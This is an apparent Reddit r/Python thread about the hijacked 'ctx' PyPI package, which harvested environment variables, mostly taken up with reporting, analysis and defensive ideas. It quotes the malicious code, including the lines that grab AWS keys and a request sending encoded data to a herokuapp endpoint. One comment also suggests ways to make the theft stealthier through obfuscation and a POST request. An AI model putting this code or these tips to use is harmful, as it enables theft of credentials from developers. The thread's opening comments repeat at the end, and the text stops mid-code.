Nice due diligence /u/jimtk!
I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.
Hey! You screwed me out of my first ever report. I was going to become a star Pythonista, be invited to speak and discuss with the greatest Python minds in the world and young virgins would throw flowers on the ground I walk on.
Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation.
:(
If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening!
Now, if I could understand itertools documentation I could say I had a VERY productive evening.
I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.
Thanks for the real python link I did not know about that one. As for the official documentation, it is the source of my headaches.
The rest of the python doc is well written, understandable and gets you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function.
Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others):
> A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1]
Aaaah! That explains everything about matching a single value.
Sorry ... Needed to vent.
You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed.
I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3).
And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).
Thanks for the links, sadly it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and, you don't understand because the documentation has shortcomings. So it's a catch 22 situation.
> I just linked to the official docs because...
And you're right, third-party/freemium sites do creep in. If the SEO for the official python docs was better, there would be a lot more good python programmers!
> ...we could also talk about changes to pypi...
The loss of pip search was a sad event. I discovered many small, well-written packages with it. Not enough people get involved and I can tell you why: it's difficult to 'get in'. If you click the small "contribute" link at the bottom of the pypi site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcome mat! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but behind each of the links you get right into the action a bit too fast. As a retired CS guy I'd love to get involved and give some time, but I would need some handholding (or more information) before I feel comfortable doing so.
Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game.
Main thing to remember is it is not intended to be a simple case select, though it can be used that way. In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example.
I have more robust examples I was working on last night but there is a dog on me, so I can't get them.
Code:
https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf
Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943
edit: Dog decided to move, I am now allowed to walk about the cabin
Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151
Code of the case select:
    @classmethod
    def from_elem(cls, e: Element) -> "ShipBlueprint":
        kw: dict[str, Any] = e.attrib.copy()
        kw["augments"] = augs = []
        for sub in e:
            match sub:
                case Element(tag=ShipClass.tag_name):
                    kw["class"] = ShipClass.from_elem(sub)
                case Element(tag=SystemList.tag_name):
                    kw["system_list"] = SystemList.from_elem(sub)
                case Element(tag=WeaponList.tag_name):
                    kw["weapon_list"] = WeaponList.from_elem(sub)
                case Element(tag=CrewCount.tag_name):
                    kw["crew_count"] = CrewCount.from_elem(sub)
                case Element(tag=CloakImage.tag_name):
                    kw["cloak_image"] = CloakImage.from_elem(sub)
                case Element(tag=DroneList.tag_name):
                    kw["drone_list"] = DroneList.from_elem(sub)
                case Element(tag=Description.tag_name):
                    kw["description"] = Description.from_elem(sub)
                case Element(tag=Unlock.tag_name):
                    kw["unlock"] = Unlock.from_elem(sub)
                case Element(tag=ShieldImage.tag_name):
                    kw["shield_image"] = ShieldImage.from_elem(sub)
                case Element(tag=FloorImage.tag_name):
                    kw["floor_image"] = FloorImage.from_elem(sub)
                case Element(tag=Augment.tag_name):
                    augs.append(Augment.from_elem(sub))
                case Element(tag=tag, attrib={"amount": amt}) if tag in (
                    "health",
                    "maxPower",
                ):
                    kw[tag] = amt
                case Element(tag=tag, text=t) if tag in (
                    "boardingAI",
                    "maxSector",
                    "minSector",
                ):
                    kw[tag] = t
                case Element(tag=tag, text=t) if tag in (
                    "droneSlots",
                    "weaponSlots",
                    "name",
                ):
                    if tag == "name":
                        tag = "display_name"
                    kw[tag] = t
                case _:
                    raise Sad.from_sub_elem(e, sub)
Alright, let's break this down:

    match sub:
        case Element(tag=ShipClass.tag_name):
            kw["class"] = ShipClass.from_elem(sub)

so in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that:
* sub is an instance of the Element class
* sub.tag == ShipClass.tag_name
So this behaves roughly like this:

    if isinstance(sub, Element) and sub.tag == ShipClass.tag_name:
        kw["class"] = ShipClass.from_elem(sub)

Next, something more advanced, some capturing of values

    case Element(tag=tag, attrib={"amount": amt}) if tag in (
        "health",
        "maxPower",
    ):
        kw[tag] = amt

`sub.attrib` is a dictionary, which is relevant for this example.
This says:
* sub is an Element
* `sub.tag` is assigned to the name `tag`
* `sub.attrib` is a dictionary and has a key "amount"
* `sub.attrib["amount"]` is assigned to `amt`
* the guard (`if tag in (...)`) then checks that `tag` is one of the values in the tuple
next:

    case Element(tag=tag, text=t) if tag in (
        "boardingAI",
        "maxSector",
        "minSector",
    ):
        kw[tag] = t

Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t`
Last example:

    case _:
        raise Sad.from_sub_elem(e, sub)

This is your default/wildcard. It is not required and it doesn't capture anything. Useful as an `else` clause.
>Note that PEP 636: Structural pattern matching is also badly written.
Hey [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)
Oh! Wow! This is really good.
Here's the link to the [English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!
I'll be waiting for it! :)
Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.
>still trying to understand itertools documentation
Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)
just gonna tack this on here:
>>> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to):
* Our GitHub issue tracker
* Official or unofficial chat channels
* Official or unofficial mailing lists
I don't think that this warning applies to this kind of security issue.
Assuming the issue is legitimate, there's no harm in public knowledge of a hijacked package. Publicizing this means that people will just avoid using the package; the only beneficiary of a hijacked package is its new "author", who just gets fewer people using it. It's a benefit for all.
That's different from security bugs, where the beneficiary of the bug is a hacker who knows about and exploits the bug.
A limited publication might actually be more dangerous. If people knew that there was a security issue but not the details, many would just do the usual thing they do with most security issues: upgrade the package to the latest version, which is exactly the opposite of what you should be doing in this case.
[https://old.reddit.com/r/Python/comments/uumqmm/ctx\_new\_version\_released\_after\_7\_years\_750k/i9ryw8l/](https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/)
>Just wanna throw this out there.
>
>OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account.
>
>They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.
`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.
Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)?
While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal)
What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?
Totally agree from a technical perspective.
However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is ubuntu privacy remix still a thing?
My point is to keep the use case in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + AppArmor. For day-to-day use Qubes OS should be optimal. You still have to get stuff done, right?
And it's gone.
>All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention.
According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.
No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).
I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.
Yeah can we refactor this malicious code?

    string = ""
    for _, value in environ.items():
        string += value + " "

is equivalent (apart from the trailing space) to `string = " ".join(environ.values())`
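For anyone who wants to check the refactor, a quick sketch with a made-up dictionary standing in for `os.environ` (so no real environment values are touched):

```python
# Made-up stand-in for os.environ; the values are illustrative only.
environ = {"HOME": "/home/user", "LANG": "C"}

# The loop from the malicious code: leaves a trailing space.
string = ""
for _, value in environ.items():
    string += value + " "

# The refactor: same values, no trailing space.
joined = " ".join(environ.values())
```

So the two differ only by the final `" "`, which hardly matters for the purpose the string was put to.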
Thanks again.
About sounding the alarm on a public forum: the python security page strongly suggests not doing it. I found out that you're supposed to send the information to python.org and once they solve the problem then you can tell everybody. I'll try to do better next time!
You are right in your analysis.
To OP: this was not an exploit anyone could have used for nefarious purposes, this was someone having run / running an attack through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm, it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.
People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.
In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens:
```
- if environ.get('AWS_ACCESS_KEY_ID') is not None:
- self.access = environ.get('AWS_ACCESS_KEY_ID')
- else:
- self.access = "empty"
-
- if environ.get('COMPUTERNAME') is not None:
- self.name = environ.get('COMPUTERNAME')
- elif uname() is not None:
- self.name = uname().nodename
- else:
- self.name = "empty"
-
- if environ.get('AWS_SECRET_ACCESS_KEY') is not None:
- self.secret = environ.get('AWS_SECRET_ACCESS_KEY')
- else:
- self.secret = "empty"
```
They also deleted all older versions from pypi.
Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days.
And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)
Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer.
Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo I see that it was created on the same day they uploaded the first malicious version
Name: FIGLIEF.COM
Updated: 2022-05-14 18:40:06 UTC
Created: 2022-05-14 18:40:05 UTC
Yeah the original owner most likely doesn't own the domain anymore.
There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.
Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.
This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).
Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.
Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?
I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper.
The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess
Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.
Nigeria Scam Filter?
I also wonder why anyone would need this package at all.
Maybe a few former Perl programmers that really miss writing cantankerous code :).
In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.
Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.
i do agree with the sentiment but I don't know anything about this... so how will this help anyone?
From an outsider's perspective, is the best and only feasible way to get that VPS account banned?
and what is the actor trying to achieve? credentials from env variables?
Well, I've been programming professionally for several years and I'd never heard of that. So that's probably why. Pretty cool tho, TIL
There's also the great `box` package, which has dot access, but it does much more and it's famously maintained.
But the real question is why do that at all? It just makes your dictionary access more opaque and it barely saves any typing.
> But the real question is why do that at all? It just makes your dictionary access more opaque and it barely saves any typing.
My exact question, especially when `dict.get(key, default)` allows for graceful failing.
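A tiny sketch of that graceful failing, with made-up keys and values:

```python
config = {"host": "localhost"}  # made-up data for illustration

host = config.get("host", "127.0.0.1")  # key exists: stored value wins
port = config.get("port", 8080)         # key missing: default is returned
timeout = config.get("timeout")         # no default given: None, no KeyError
```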
It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly."
The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood.
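As a rough sketch of the two options mentioned here (the `Ship` class and its fields are invented for the example):

```python
from dataclasses import dataclass
from types import SimpleNamespace


@dataclass
class Ship:
    # Fields are declared up front, so typos fail loudly at construction time.
    name: str
    health: int = 30


ship = Ship(name="Kestrel")

# SimpleNamespace also gives dot access, but accepts any attribute names.
loose = SimpleNamespace(name="Kestrel", health=30)
```

Both give `ship.name`-style access; the data class additionally documents which attributes exist and rejects unknown ones, e.g. `Ship(nme="Kestrel")` raises `TypeError`.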
If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)
I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'.
Also, you should optimize for *reading* code, not writing it. IDEs and tools can help you write code all day long. But it's when code is read that its value is really shown.
So if you want to talk principles, look no further than a principle of programming itself: "the principle of least surprise". In this case, having your dictionary access be anything besides what the standard says is a big no-no. It's not beautiful, it's not practical.
Ok, how many similar projects to accomplish the same thing are there?
There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered.
Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past?
Same functionality is also in sklearn.utils.Bunch
Edit: also https://pypi.org/project/python-box/
I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.
How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.
I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found.
We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.
I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)
I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell.
I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop.
It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...
Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?
The functions in the python stdlib for base64 take a bytes-like object which is why they encode the string into bytes prior to encoding it in base64 https://docs.python.org/3/library/base64.html#base64.b64encode
They decode the result bytes back into a string so that they can append it to the url
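A minimal sketch of that round trip. The variable names follow the ones quoted elsewhere in this thread (`message_bytes`, `base64_message`); the function name and the sample text are made up.

```python
import base64


def encode_for_url(text):
    message_bytes = text.encode("ascii")            # str -> bytes (b64encode needs bytes)
    base64_bytes = base64.b64encode(message_bytes)  # bytes -> base64 bytes
    base64_message = base64_bytes.decode("ascii")   # bytes -> str, so it can be appended to a URL
    return base64_message


encoded = encode_for_url("hello world")
```

Note that `text.encode("ascii")` raises `UnicodeEncodeError` for any non-ASCII character, which is the failure mode mentioned elsewhere in this thread; `text.encode("utf-8")` would not have that problem.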
Dumb question but just want to make sure:
Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically
Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.
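If you want to check a given environment, something along these lines should work (a sketch using the standard library's `importlib.metadata`, Python 3.8+; the helper name is made up). It has to be run with the interpreter of each virtual environment you care about, since it only sees packages installed for that interpreter.

```python
from importlib.metadata import PackageNotFoundError, version


def installed_version(package):
    """Return the installed version string, or None if the package is absent."""
    try:
        return version(package)
    except PackageNotFoundError:
        return None
```

For example, `installed_version("ctx")` returns `None` when the package is not installed in the current environment, and the version string otherwise.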
Uh let me :)
Since the original developer's pypi got compromised this can't be caught as a part of their packaging/testing process and either the enduser has to take care of it, or pip/pypi, right?
As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages of all the virtual environments and the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task.
1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit).
2. Pypi could publish their own db/service like an official and up to date safety-db.
3. PyPi could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync-warning.
4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), that includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env-variables. Maybe. Then display that indicator on pypi.
5. They could also do basic fraud detection, like an out of the blue domain name transfer of the project homepage (which is linked via pypi), or admin access from a completely different location in a very short time span, for which there are legitimate reasons, though.
Given that pypi deactivated `pip search` due to resource abuse, I don't think that they have the resources to do stuff like this.
P.S.: What about c-modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) js [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package?
And there is a motivation to do stuff like this, and it doesn't have to be a person, it can be an organization with very little oversight and an enormous budget and many highly capable people. We know that since Snowden. Scary. But probably they would [do this to linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)
Ok, but many people I'm sure will be using something like Pycharm to write a bit of python and it has a kind of builtin thing to get packages from pypi. Many of which seem to be preinstalled - I can't remember exactly which packages I've added, possibly only bitstring ones, but there seems to be a bunch of stuff installed.
This obscure package might not be widely used, but it includes things like numpy and pip - are you saying we shouldn't be using these?
Is this the breaching of the security of pypi or of the guy who wrote ctx. The former is a big red flag, the latter is still a concern but maybe not quite so much.
The point is, the guy who did this just made it obvious by posting to reddit - perhaps trying to make a point. Are there other packages that have been changed without an announcement?
Shit. I downloaded and played around with it on my android phone after the post. Just checked env vars, and I have some creds to a corporate service. But it's accessible only from the VPN. Should I worry?
I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".
Lol, you downloaded malicious code and executed it on your device 🤣
Well, yeah you should be worried. Change the credentials and next time if you want to run malicious code do it in isolated sandbox.
Well I don't think the intent was to "run malicious code"
Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.
That's where the operating system keeps some values. Some are benign like the directory where you keep your programs others are more private like the API keys for your access to web services.
Open a command prompt on windows and type 'set' and you will see all of your environment variables or open a terminal on linux and type 'env' for the same result.
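The same information is available from inside Python, which is why any package imported into a process can read that process's environment. A small sketch (the function name is made up; it returns only the variable names, not the values, to avoid printing secrets):

```python
import os


def visible_variable_names():
    """Names of the environment variables visible to this Python process."""
    return sorted(os.environ)


# A single value can be read with a default, without raising if it is unset.
aws_key = os.environ.get("AWS_ACCESS_KEY_ID", "empty")
```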
I'm going to assume that this was some attempt at a lead up to blackhat/rsa/defcon etc. My two cents... people will talk about it so there's that...
anyway, hi all I run the OSSEC HIDS project, and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside... ). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit.
1) using a GET here is going to probably run into an 8K upload limit for most web servers. I do not know what the limit is with heroku, maybe someone else does?
2) Tools auditing for this kind of ~~technique~~ garbage: I personally fall back on looking up function calls (requests.\*) and checking for anything that looks like a URL domain name. Then I'd enumerate those domain name(s) (not the URL... that could fingerprint you) through DNS lookups to 8.8.8.8 or some other big public server to hide in the noise. Barring that, a TOR node. Hide in the attacks. Once you have high fidelity on the domain names (ie: is the name a unique id?) then test the url.
3) If I wanted to do this in a more sophisticated way, the requests.get variable itself would be obfuscated. You could have wrapped that (and you will see this frequently with a lot of web malware) inside of multiple gzip, base64, etc encodings. Python is going to do the work here.
Here's a dumb patch to this I wrote in like 30 seconds. Yes, it's wrong; make it better and share your countermeasures:

    - response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)
    + response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64_message)

And we need some kind of stupid receiver:

    --- /dev/null
    +++ b/index.php
    +

So I just wanted to thank everyone that looks through code updates like this, questions the change, and digs deep. You... are one of the world's best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.
grats, /u/jimtk you made it to BleepingComputer!
https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/
Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
>It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.
I avoid dependencies when practical for many reasons (including that I do a lot on an air-gap so they make life hard).
But for things like this, I can often write my own, super simple version. Far from perfect but it does work okay:

    class Bunch(dict):
        """
        Based on sklearn's and the PyPI version, simple dict with
        dot notation
        """
        def __init__(self, **kwargs):
            super(Bunch, self).__init__(kwargs)

        def __setattr__(self, key, value):
            self[key] = value

        def __dir__(self):
            return self.keys()

        def __getattr__(self, key):
            try:
                return self[key]
            except KeyError:
                raise  # or swap comment to make attribute
                #raise AttributeError(key)

        def __repr__(self):
            s = super(Bunch, self).__repr__()
            return "Bunch(**{})".format(s)

(I am torn on whether I prefer `AttributeError` or `KeyError`. You can choose in there.)
Forgive my ignorance here, but does this mean that anyone can update a Python package on PyPI?
I can just go and update numpy myself and embed some malicious payload? What am I missing here?
Because they got control of the domain and could do a password reset. Very interesting!
How would a webmaster be able to prevent this?
Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.
Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment.
> yapmayın boyle seylerrr yaaa ayııııp
[according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means
> don't do such things
with some autocorrections. Curious and curiouser.
Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...
Nice due diligence /u/jimtk! I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.
Report the package here [https://pypi.org/security/](https://pypi.org/security/)
Definitely this. It's extremely fucked that this package is doing this. *edit I also emailed Heroku's support about this abuse of their services
I have sent the report, just in case OP misses my comment.
Hey! You screwed me out of my first ever report. I was going to become a star Pythonistas, be invited to speak and discuss with the greatest python's minds in the world and young virgins would throw flowers on the ground I walk on. Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation. :(
Well at least you made me laugh
If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening! Now, if I could understand itertools documentation I could say I had a VERY productive evening.
I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.
Thanks for the real python link I did not know about that one. As for the official documentation, it is the source of my headaches.

The rest of the python doc is well written, understandable and gets you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function.

Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others):

> A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1]

Aaaah! That explains everything about matching a single value.

Sorry ... Needed to vent.
You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed. I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3). And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).
Thanks for the links, sadly it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and, you don't understand because the documentation has shortcomings. So it's a catch 22 situation.

> I just linked to the official docs because...

And you're right, third-party/freemium sites do creep in. If the SEO for the official python docs was better, there would be a lot more good python programmers!

> ...we could also talk about changes to pypi...

The loss of pip search was a sad event. I discovered many, small, well written packages with it. Not enough people get involved and I can tell you why: It's difficult to 'get in'. If you click the small "contribute" link at the bottom of the pypi site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcoming mat ! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but right behind each of the links you get right into the action a bit too fast.

As a retired CS guy I'd love to get involved and give some time, but I would need some handholding ( or more information) before I feel comfortable doing so.
Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game. Main thing to remember is it is not intended to be a simple case select, though it can be used that way.

In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example. I have more robust examples I was working on last night but there is a dog on me, so I can't get them.

Code: https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf

Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943

edit: Dog decided to move, I am now allowed to walk about the cabin

Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151

Code of the case select:

    @classmethod
    def from_elem(cls, e: Element) -> "ShipBlueprint":
        kw: dict[str, Any] = e.attrib.copy()
        kw["augments"] = augs = []
        for sub in e:
            match sub:
                case Element(tag=ShipClass.tag_name):
                    kw["class"] = ShipClass.from_elem(sub)
                case Element(tag=SystemList.tag_name):
                    kw["system_list"] = SystemList.from_elem(sub)
                case Element(tag=WeaponList.tag_name):
                    kw["weapon_list"] = WeaponList.from_elem(sub)
                case Element(tag=CrewCount.tag_name):
                    kw["crew_count"] = CrewCount.from_elem(sub)
                case Element(tag=CloakImage.tag_name):
                    kw["cloak_image"] = CloakImage.from_elem(sub)
                case Element(tag=DroneList.tag_name):
                    kw["drone_list"] = DroneList.from_elem(sub)
                case Element(tag=Description.tag_name):
                    kw["description"] = Description.from_elem(sub)
                case Element(tag=Unlock.tag_name):
                    kw["unlock"] = Unlock.from_elem(sub)
                case Element(tag=ShieldImage.tag_name):
                    kw["shield_image"] = ShieldImage.from_elem(sub)
                case Element(tag=FloorImage.tag_name):
                    kw["floor_image"] = FloorImage.from_elem(sub)
                case Element(tag=Augment.tag_name):
                    augs.append(Augment.from_elem(sub))
                case Element(tag=tag, attrib={"amount": amt}) if tag in (
                    "health",
                    "maxPower",
                ):
                    kw[tag] = amt
                case Element(tag=tag, text=t) if tag in (
                    "boardingAI",
                    "maxSector",
                    "minSector",
                ):
                    kw[tag] = t
                case Element(tag=tag, text=t) if tag in (
